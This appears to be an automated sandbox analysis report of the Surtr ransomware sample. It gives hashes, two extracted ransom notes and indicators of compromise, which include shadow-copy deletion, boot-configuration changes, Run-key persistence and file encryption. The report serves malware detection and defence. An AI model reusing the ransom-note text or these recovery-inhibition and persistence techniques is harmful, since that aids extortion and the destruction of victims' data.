4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

Analysis

max time kernel
141s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
02-03-2022 08:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Surtr.exe
Size

191KB
MD5

664cf36657bf55f20cac44505d3bbb2c
SHA1

a48f8089455201895757503255d0f573ce5d3c66
SHA256

4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA512

42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address Dec_youfile1986@mailfence.com use this ID( 0r6fjlh4j8u4ts ) for the title of your email. if you weren't able to contact us within 24 hours please email : Telegram id @Ransome_Decrypters Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

Dec_youfile1986@mailfence.com

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address Dec_youfile1986@mailfence.com use this ID (0r6fjlh4j8u4ts) for the title of your email . If you weren't able to contact us within 24 hours please email : Telegram id @Ransome_Decrypters If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

Dec_youfile1986@mailfence.com

Signatures

Deletes NTFS Change Journal 2 TTPs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
ransomware

Inhibit System Recovery
T1490

Data Destruction
T1485
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

5712 bcdedit.exe
5892 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

5140 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
5712	bcdedit.exe
5892	bcdedit.exe

pid	process
5140	wbadmin.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Service\Surtr.exe	upx
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe	upx
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Surtr.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation Surtr.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Surtr.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 28 IoCs

Processes:

Surtr.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Links\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Surtr.exe
File opened for modification	C:\Program Files\desktop.ini	Surtr.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	Surtr.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Surtr.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exeSurtr.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\G:	Surtr.exe
File opened (read-only)	\??\A:	Surtr.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\P:	Surtr.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\R:	Surtr.exe
File opened (read-only)	\??\T:	Surtr.exe
File opened (read-only)	\??\V:	Surtr.exe
File opened (read-only)	\??\E:	Surtr.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\N:	Surtr.exe
File opened (read-only)	\??\W:	Surtr.exe
File opened (read-only)	\??\B:	Surtr.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\K:	Surtr.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\O:	Surtr.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\Y:	Surtr.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\F:	Surtr.exe
File opened (read-only)	\??\H:	Surtr.exe
File opened (read-only)	\??\Q:	Surtr.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\L:	Surtr.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\X:	Surtr.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\M:	Surtr.exe
File opened (read-only)	\??\U:	Surtr.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\Z:	Surtr.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com

flow	ioc
15	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Surtr.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	Surtr.exe

Drops file in Program Files directory 64 IoCs

Processes:

Surtr.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-pl.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\Comb_field_White@1x.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\SURTR_README.txt	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\SURTR_README.hta	Surtr.exe
File created	C:\Program Files\Windows Defender\es-ES\SURTR_README.hta	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\SURTR_README.hta	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\SURTR_README.txt	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Sign_White@1x.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\SURTR_README.txt	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar	Surtr.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\TimeCard.xltx	Surtr.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\SURTR_README.hta	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tr\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\Context.snippets.ps1xml	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\hr-hr\SURTR_README.txt	Surtr.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\LICENSE	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\he-il\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-oob.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5172 schtasks.exe
5328 schtasks.exe
5268 schtasks.exe

pid	process
5172	schtasks.exe
5328	schtasks.exe
5268	schtasks.exe

Interacts with shadow copies 2 TTPs 52 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
4620	vssadmin.exe
6160	vssadmin.exe
6844	vssadmin.exe
7512	vssadmin.exe
7596	vssadmin.exe
7588	vssadmin.exe
7384	vssadmin.exe
6324	vssadmin.exe
4264	vssadmin.exe
6024	vssadmin.exe
7416	vssadmin.exe
7652	vssadmin.exe
7900	vssadmin.exe
7868	vssadmin.exe
8020	vssadmin.exe
1896	vssadmin.exe
5684	vssadmin.exe
6916	vssadmin.exe
7876	vssadmin.exe
8168	vssadmin.exe
5488	vssadmin.exe
4504	vssadmin.exe
5676	vssadmin.exe
7304	vssadmin.exe
7604	vssadmin.exe
8176	vssadmin.exe
4060	vssadmin.exe
4176	vssadmin.exe
4204	vssadmin.exe
2796	vssadmin.exe
5900	vssadmin.exe
6880	vssadmin.exe
7552	vssadmin.exe
7884	vssadmin.exe
7800	vssadmin.exe
7396	vssadmin.exe
7424	vssadmin.exe
7752	vssadmin.exe
7780	vssadmin.exe
4804	vssadmin.exe
5724	vssadmin.exe
7504	vssadmin.exe
7228	vssadmin.exe
7792	vssadmin.exe
4616	vssadmin.exe
6800	vssadmin.exe
7472	vssadmin.exe
7524	vssadmin.exe
7568	vssadmin.exe
4128	vssadmin.exe
8088	vssadmin.exe
4756	vssadmin.exe

Modifies registry class 6 IoCs

Processes:

StartMenuExperienceHost.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surtr	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surtr\ = "surtr_auto_file"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Surtr.exe

pid	process
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
